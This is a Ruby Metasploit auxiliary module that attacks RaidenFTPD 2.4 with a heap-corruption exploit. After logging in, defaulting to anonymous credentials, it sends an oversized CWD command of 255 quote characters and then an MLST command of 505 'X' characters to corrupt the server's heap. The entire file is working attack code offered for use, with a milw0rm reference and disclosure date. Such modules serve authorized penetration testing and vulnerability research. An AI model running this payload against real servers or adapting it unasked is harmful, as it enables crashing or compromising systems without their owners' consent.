require 'msf/core'

class Metasploit3 < Msf::Auxiliary

	include Msf::Exploit::Remote::Ftp

	def initialize(info = {})
		super(update_info(info,	
			'Name'           => 'RaidenFTPD 2.4 CWD MLST Heap Corruption',
			'Description'    => %q{
				RaidenFTPD is vulnerable to heap corruption.  You 
				need to have a valid login so you can run CWD and MLST.
				Port of exploit by dmnt.
			},
			'Author'         => 'Saint Patrick',
			'License'        => MSF_LICENSE,
			'Version'        => '1',
			'References'     =>
				[ [ 'URL', 'http://milw0rm.com/exploits/6742'],
					['BID','31741']
				 ],
			'DisclosureDate' => 'Oct 12 2008'))

		# Needed to get to the commands
		register_options([
			OptString.new('FTPUSER', [ true, 'Valid FTP username', 'anonymous' ]),
			OptString.new('FTPPASS', [ true, 'Valid FTP password for username', 'anonymous' ])
		])
	end

	def run
		return unless connect_login

		print_status("Sending commands...")
		# The one, two punch
		raw_send_recv("CWD /#{'"' * 255}\r\n")
		raw_send_recv("MLST #{'X' * 505}\r\n")

		disconnect
	end
end